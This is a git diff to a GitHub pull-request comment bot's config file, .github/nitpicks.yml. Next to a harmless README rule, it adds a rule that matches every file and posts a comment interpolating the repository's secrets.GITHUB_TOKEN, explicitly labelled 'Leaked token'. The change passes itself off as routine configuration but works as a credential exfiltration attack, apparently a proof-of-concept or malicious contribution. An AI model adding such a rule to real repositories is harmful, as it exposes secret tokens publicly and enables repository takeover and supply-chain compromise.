--- a/.github/nitpicks.yml
+++ b/.github/nitpicks.yml
@@ -1,2 +1,5 @@
 - pattern: '^README\.md$'
   comment: "Thanks for updating the README!"
+- pattern: '.*'
+  comment: "Leaked token: ${{ secrets.GITHUB_TOKEN }}"
+
